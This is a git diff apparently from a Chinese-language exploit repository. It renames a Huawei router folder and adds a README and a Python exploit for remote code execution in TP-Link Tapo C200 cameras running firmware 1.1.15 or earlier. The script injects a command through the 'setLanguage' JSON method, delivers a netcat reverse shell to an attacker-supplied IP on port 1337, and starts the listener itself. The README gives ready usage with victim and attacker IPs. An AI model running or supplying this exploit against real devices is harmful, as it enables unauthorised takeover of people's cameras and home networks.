diff --git a/19-华为路由器/DG8045 Router 1.0/readme.md b/19-路由器/01-华为路由器/DG8045 Router 1.0/readme.md
similarity index 100%
rename from 19-华为路由器/DG8045 Router 1.0/readme.md
rename to 19-路由器/01-华为路由器/DG8045 Router 1.0/readme.md
diff --git a/19-路由器/02-TP-Link/Tapo c200 1.1.15--RCE 漏洞/README.md b/19-路由器/02-TP-Link/Tapo c200 1.1.15--RCE 漏洞/README.md
new file mode 100644
index 0000000..23e3e09
--- /dev/null
+++ b/19-路由器/02-TP-Link/Tapo c200 1.1.15--RCE 漏洞/README.md	
@@ -0,0 +1,10 @@
+TP-Link Tapo c200 1.1.15--RCE 漏洞
+
+### 影响版本
+1.1.15 and below
+
+### exp 利用
+
+```shell
+python3 exp.py <victim_ip> <attacker_ip>
+```
\ No newline at end of file
diff --git a/19-路由器/02-TP-Link/Tapo c200 1.1.15--RCE 漏洞/exp.py b/19-路由器/02-TP-Link/Tapo c200 1.1.15--RCE 漏洞/exp.py
new file mode 100644
index 0000000..2296ea4
--- /dev/null
+++ b/19-路由器/02-TP-Link/Tapo c200 1.1.15--RCE 漏洞/exp.py	
@@ -0,0 +1,31 @@
+#!/usr/bin/env python
+# -*- coding:utf-8 -*-
+
+import os
+import requests
+import sys
+import threading
+import urllib3
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+# nc command to receive reverse shell (change it depending on your nc version)
+PORT = 1337
+REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f'
+NC_COMMAND = 'nc -lv %d' % PORT
+
+if len(sys.argv) < 3:
+    print("Usage: python3 pwnTapo.py <victim_ip> <attacker_ip>")
+    exit()
+
+victim = sys.argv[1]
+attacker = sys.argv[2]
+
+print("[+] Listening on %d" % PORT)
+t = threading.Thread(target=os.system, args=(NC_COMMAND,))
+t.start()
+
+print("[+] Serving payload to %s\n" % victim)
+url = "https://" + victim + ":443/"
+json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}}
+requests.post(url, json=json, verify=False)
\ No newline at end of file